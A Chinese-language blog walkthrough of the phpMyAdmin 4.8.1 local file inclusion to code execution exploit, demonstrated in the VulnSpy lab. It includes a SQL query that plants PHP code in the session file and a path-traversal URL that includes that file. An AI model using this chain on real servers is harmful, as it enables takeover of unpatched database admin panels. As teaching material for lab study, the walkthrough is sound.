phpMyAdmin 4.8.x 本地文件包含漏洞利用

phpMyAdmin 4.8.x 本地文件包含漏洞利用


今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

phpMyAdmin 4.8.x 本地文件包含漏洞利用

2. 等待载入设置后,点击 GO 按钮开启实验

phpMyAdmin 4.8.x 本地文件包含漏洞利用

3. 实验创建完成后,点击演示地址进入实验

phpMyAdmin 4.8.x 本地文件包含漏洞利用

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

phpMyAdmin 4.8.x 本地文件包含漏洞利用

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

select '<?php phpinfo();exit;?>'

phpMyAdmin 4.8.x 本地文件包含漏洞利用

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

phpMyAdmin 4.8.x 本地文件包含漏洞利用

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

phpMyAdmin 4.8.x 本地文件包含漏洞利用

GitHub 源码

https://github.com/vulnspy/phpmyadmin-4.8.1

参考

【首发】phpmyadmin4.8.1后台getshell
phpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

上一篇:关于Kafka配额的讨论(2)


下一篇:百度Web前端面试经历